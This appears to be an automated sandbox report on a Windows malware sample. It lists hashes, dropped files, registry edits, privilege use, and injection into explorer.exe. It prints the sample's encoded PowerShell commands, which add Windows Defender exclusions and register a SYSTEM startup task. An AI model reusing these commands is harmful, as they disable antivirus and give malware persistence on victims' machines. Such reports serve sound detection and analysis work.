af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

Analysis

max time kernel
299s
max time network
303s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
17/09/2022, 10:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
Size

2.5MB
MD5

0119f6316586f89f83c24254c6927dd9
SHA1

eb462b622d6038638889154839238105a17f508b
SHA256

af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e
SHA512

f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653
SSDEEP

49152:35mGlO0aBsajwiCzLaeG862uwnYn9fRLdrAoVMkTEHMUHqyuWoG:0G8/Bspp/p+3rjspTj

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4864	qwfqwf.exe
4576	explorer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qwfqwf.exe.log	qwfqwf.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\4BFD.tmp	qwfqwf.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4864 set thread context of 4576	4864	qwfqwf.exe	81

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\qwfqwf.exe	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
File opened for modification	C:\Program Files\qwfqwf.exe	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
File created	C:\Program Files\Google\Libs\WR64.sys	qwfqwf.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	qwfqwf.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	qwfqwf.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	qwfqwf.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	qwfqwf.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3340	powershell.exe
3340	powershell.exe
3340	powershell.exe
3044	powershell.exe
3044	powershell.exe
3044	powershell.exe
2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
3160	powershell.exe
3160	powershell.exe
3160	powershell.exe
900	powershell.exe
900	powershell.exe
900	powershell.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe
4576	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeIncreaseQuotaPrivilege	3340	powershell.exe
Token: SeSecurityPrivilege	3340	powershell.exe
Token: SeTakeOwnershipPrivilege	3340	powershell.exe
Token: SeLoadDriverPrivilege	3340	powershell.exe
Token: SeSystemProfilePrivilege	3340	powershell.exe
Token: SeSystemtimePrivilege	3340	powershell.exe
Token: SeProfSingleProcessPrivilege	3340	powershell.exe
Token: SeIncBasePriorityPrivilege	3340	powershell.exe
Token: SeCreatePagefilePrivilege	3340	powershell.exe
Token: SeBackupPrivilege	3340	powershell.exe
Token: SeRestorePrivilege	3340	powershell.exe
Token: SeShutdownPrivilege	3340	powershell.exe
Token: SeDebugPrivilege	3340	powershell.exe
Token: SeSystemEnvironmentPrivilege	3340	powershell.exe
Token: SeRemoteShutdownPrivilege	3340	powershell.exe
Token: SeUndockPrivilege	3340	powershell.exe
Token: SeManageVolumePrivilege	3340	powershell.exe
Token: 33	3340	powershell.exe
Token: 34	3340	powershell.exe
Token: 35	3340	powershell.exe
Token: 36	3340	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeIncreaseQuotaPrivilege	3044	powershell.exe
Token: SeSecurityPrivilege	3044	powershell.exe
Token: SeTakeOwnershipPrivilege	3044	powershell.exe
Token: SeLoadDriverPrivilege	3044	powershell.exe
Token: SeSystemProfilePrivilege	3044	powershell.exe
Token: SeSystemtimePrivilege	3044	powershell.exe
Token: SeProfSingleProcessPrivilege	3044	powershell.exe
Token: SeIncBasePriorityPrivilege	3044	powershell.exe
Token: SeCreatePagefilePrivilege	3044	powershell.exe
Token: SeBackupPrivilege	3044	powershell.exe
Token: SeRestorePrivilege	3044	powershell.exe
Token: SeShutdownPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeSystemEnvironmentPrivilege	3044	powershell.exe
Token: SeRemoteShutdownPrivilege	3044	powershell.exe
Token: SeUndockPrivilege	3044	powershell.exe
Token: SeManageVolumePrivilege	3044	powershell.exe
Token: 33	3044	powershell.exe
Token: 34	3044	powershell.exe
Token: 35	3044	powershell.exe
Token: 36	3044	powershell.exe
Token: SeIncreaseQuotaPrivilege	3044	powershell.exe
Token: SeSecurityPrivilege	3044	powershell.exe
Token: SeTakeOwnershipPrivilege	3044	powershell.exe
Token: SeLoadDriverPrivilege	3044	powershell.exe
Token: SeSystemProfilePrivilege	3044	powershell.exe
Token: SeSystemtimePrivilege	3044	powershell.exe
Token: SeProfSingleProcessPrivilege	3044	powershell.exe
Token: SeIncBasePriorityPrivilege	3044	powershell.exe
Token: SeCreatePagefilePrivilege	3044	powershell.exe
Token: SeBackupPrivilege	3044	powershell.exe
Token: SeRestorePrivilege	3044	powershell.exe
Token: SeShutdownPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeSystemEnvironmentPrivilege	3044	powershell.exe
Token: SeRemoteShutdownPrivilege	3044	powershell.exe
Token: SeUndockPrivilege	3044	powershell.exe
Token: SeManageVolumePrivilege	3044	powershell.exe
Token: 33	3044	powershell.exe
Token: 34	3044	powershell.exe
Token: 35	3044	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2484 wrote to memory of 3340	2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe	66
PID 2484 wrote to memory of 3340	2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe	66
PID 2484 wrote to memory of 3044	2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe	69
PID 2484 wrote to memory of 3044	2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe	69
PID 2484 wrote to memory of 4108	2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe	72
PID 2484 wrote to memory of 4108	2484	af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe	72
PID 4108 wrote to memory of 4240	4108	cmd.exe	74
PID 4108 wrote to memory of 4240	4108	cmd.exe	74
PID 4864 wrote to memory of 3160	4864	qwfqwf.exe	76
PID 4864 wrote to memory of 3160	4864	qwfqwf.exe	76
PID 4864 wrote to memory of 900	4864	qwfqwf.exe	78
PID 4864 wrote to memory of 900	4864	qwfqwf.exe	78
PID 4864 wrote to memory of 8	4864	qwfqwf.exe	80
PID 4864 wrote to memory of 8	4864	qwfqwf.exe	80
PID 4864 wrote to memory of 8	4864	qwfqwf.exe	80
PID 4864 wrote to memory of 4576	4864	qwfqwf.exe	81
PID 4864 wrote to memory of 4576	4864	qwfqwf.exe	81
PID 4864 wrote to memory of 4576	4864	qwfqwf.exe	81

C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
"C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "qwfqwf"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4108
- - C:\Windows\system32\schtasks.exe
    schtasks /run /tn "qwfqwf"
    3⤵
    PID:4240

C:\Program Files\qwfqwf.exe
"C:\Program Files\qwfqwf.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:900
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe "dplckqvqeii"
  2⤵
  PID:8
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe oiwyeszwfgcchj0 XofLACsdV31j9ZQMDeZoqGi8Jt8J9pT+LaLT9/h7mc2lwG87CaVN5EzLnei9FHVsjt/hBqk2cTgsmCQzP63vQgf+54VyKHwwH69NepkH8M2stSb71uK1KIJJmTYhpCUFgEOsuzY0niiQhO4IOHEE9e4sENaUmjYuxDw5wrLuyC8LykQtm4N+vgPtPiXrgni2TUdtqXmIDR4R+72aCV7DHwsbx1WEqZrFFqJymbMq1JZVnZbh+OEPkwxlN7+zLObs1FTuo2sWS54ALgasRhnsT7kWRUUmlyabrkMK2DQmwu3LW0d6p7k8lJ5VMjQ/Cjfpy1KQsqtQ4oDh8dL288eS3kSVSx4v69CksqYI4pJt2Y4KBNDs/GHeKAzo6Bc9UNzCMef/jPbcIDe3Yp/2LYV30gzhg5rQINuyoxM58Mu8THf4E8smMaTwy1yf3v0rAXnQmaDr2jTmVoyq4UNdb8issfE5UQm2tLrv+MzA/f/rHvLGjTkGxL+MU70e1VSwZSudke4N28PyHGuhSiTevP6g3A==
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\qwfqwf.exe

Filesize
2.5MB

MD5
0119f6316586f89f83c24254c6927dd9

SHA1
eb462b622d6038638889154839238105a17f508b

SHA256
af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

SHA512
f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

Download Submit
C:\Program Files\qwfqwf.exe

Filesize
2.5MB

MD5
0119f6316586f89f83c24254c6927dd9

SHA1
eb462b622d6038638889154839238105a17f508b

SHA256
af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e

SHA512
f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
edfe53d946955f3d8b879ea0a696c7bc

SHA1
636d2a5429b39fcb41dc0b4a977adcb0acfd5522

SHA256
3e4fcf3a794d68b42ba9b48162571f7076c65b2edf8a643258a8cc777ad054ea

SHA512
1107360413a9c603e12168cef5354e6353ef0645710a510be8fa36b7603b6eaf593bdc278ccc17215c2338f3076540f6228bdd96e2a14068669155d2c9c8293d

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
memory/8-605-0x000001B1BD8A0000-0x000001B1BD8A7000-memory.dmp

Filesize
28KB

Download
memory/8-602-0x000001B1BDFD0000-0x000001B1BDFD6000-memory.dmp

Filesize
24KB

Download
memory/900-566-0x000001F0C28D0000-0x000001F0C28EC000-memory.dmp

Filesize
112KB

Download
memory/2484-120-0x0000000000660000-0x00000000008DA000-memory.dmp

Filesize
2.5MB

Download
memory/3160-247-0x00000289694A0000-0x00000289694AA000-memory.dmp

Filesize
40KB

Download
memory/3160-208-0x0000028969480000-0x000002896949C000-memory.dmp

Filesize
112KB

Download
memory/3160-214-0x0000028969970000-0x0000028969A29000-memory.dmp

Filesize
740KB

Download
memory/3340-129-0x000002033C520000-0x000002033C596000-memory.dmp

Filesize
472KB

Download
memory/3340-126-0x0000020324170000-0x0000020324192000-memory.dmp

Filesize
136KB

Download
memory/4576-609-0x00000000001A0000-0x00000000001C0000-memory.dmp

Filesize
128KB

